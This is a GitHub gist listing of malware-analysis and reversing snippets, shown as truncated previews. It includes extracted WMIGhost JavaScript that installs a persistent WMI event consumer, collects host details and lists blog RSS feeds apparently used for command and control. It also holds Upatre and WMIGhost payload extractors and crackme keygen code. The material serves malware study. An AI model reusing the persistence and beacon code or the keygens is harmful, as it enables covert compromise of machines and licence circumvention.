secrary
/ Extracted_raw_wmighost.js
Created
July 16, 2017 16:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function e(e,t){var n="winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\subscription",r=GetObject(n+":ActiveScriptEventConsumer").spawninstance_();r.name="ProbeScriptFint",r.scriptingengine="javascript",r.ScriptText=t+"var sOwner='"+e+"';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:fun |
secrary
/ formated_wmihost.js
Created
July 16, 2017 16:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var sXmlUrl = | |
| "http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss"; | |
| var sOwner = "XDD"; | |
| var MAIN = function() { | |
| $ = this; | |
| $.key = "W"; | |
| $.sFeedUrl = sXmlUrl; | |
| $.sOwner = sOwner; | |
| $.sXmlUrl = ""; | |
| $.oHttp = null; |
secrary
/ wmi_raw_formated.js
Created
July 16, 2017 17:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function e(e, t) { | |
| var n = "winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\subscription", | |
| r = GetObject(n + ":ActiveScriptEventConsumer").spawninstance_(); | |
| (r.name = "ProbeScriptFint"), (r.scriptingengine = | |
| "javascript"), (r.ScriptText = | |
| t + | |
| "var sOwner='" + | |
| e + | |
| "';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePac |
secrary
/ UpatreExtr.py
Created
July 11, 2017 13:37
Extract payload from Upatre (sample: 1b893ca3b782679b1e5d1afecb75be7bcc145b5da21a30f6c18dbddc9c6de4e7)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import ctypes | |
| import binascii | |
| input_ = input("Upatre sample: ") | |
| with open(input_, 'rb+') as file: | |
| data = file.read()[0x66d: 0x66d + 0xe40] | |
| uncompressed = ctypes.create_string_buffer(0x1200) | |
| final_size = ctypes.c_ulong(0) |
secrary
/ Extract_wmighost.py
Last active
August 2, 2017 06:09
sha256: a6ff8dfe654da70390cd71626cdca8a6f6a0d7980cd7d82269373737b04fd206
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| input_ = input("WMIGhost sample: ") | |
| with open(input_, 'rb+') as file: | |
| data = file.read()[0x3028: 0x3028 + 0x137A] | |
| with open(input_ + "_func.txt", "w") as outfile: | |
| for i, n in enumerate(data): | |
| outfile.write(chr(data[i] ^ 0x63 ^ 0xe9)) |
secrary
/ mix_two_list.py
Last active
August 21, 2017 11:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def mix_two_list(): | |
| nums = b"13337" | |
| alpha = [n for n in range(256)] | |
| edi = 0 | |
| for n in range(256): | |
| edi = (edi + alpha[n] + nums[n % 5]) % 256 | |
| tmp = alpha[n] | |
| alpha[n] = alpha[edi] | |
| alpha[edi] = tmp | |
| return alpha |
secrary
/ modify_cpuid_time.py
Created
August 21, 2017 11:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def modify_cpuid_time(from_cpu_and_time): | |
| alpha = mix_two_list() | |
| index = 0 | |
| edx = 0 | |
| res = [] | |
| for x in range(len(from_cpu_and_time)): | |
| index += 1 | |
| index = index & 0xFF | |
| edx = (alpha[index] + edx) & 0xFF | |
| tmp = alpha[index] |
secrary
/ serial_reverse.py
Created
August 21, 2017 12:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def get_serial_number(enc2): | |
| serial__number = [0 for n in range(0x400)] | |
| i = 0 | |
| j = 0 | |
| done_1 = False | |
| done_2 = False | |
| done_3 = False | |
| while j < len(enc2): | |
| if done_1 or done_2 or done_3: |
secrary
/ keygen1.py
Last active
August 21, 2017 12:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| my_base64chars = b"/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA" | |
| STANDARD_ALPHABET = b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' | |
| ENCODE_TRANS = bytes.maketrans(STANDARD_ALPHABET, my_base64chars) | |
| DECODE_TRANS = bytes.maketrans(my_base64chars, STANDARD_ALPHABET) | |
| def encode(clear): | |
| return base64.b64encode(clear).translate(ENCODE_TRANS) |
secrary
/ keyfile_first.cpp
Created
August 28, 2017 13:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| u_char al, cl; | |
| do { | |
| key[0] = 0x20 + rand() % (0x7F - 0x20); | |
| al = key[0]; | |
| u_char bl = al; // key[0] | |
| cl = bl; // key[0] | |
| DWORD ebx = (DWORD)bl << 4; | |
| al &= 0xF; | |
| DWORD ecx = (DWORD)cl >> 4; | |
| cl = ecx & 0xF; |
OlderNewer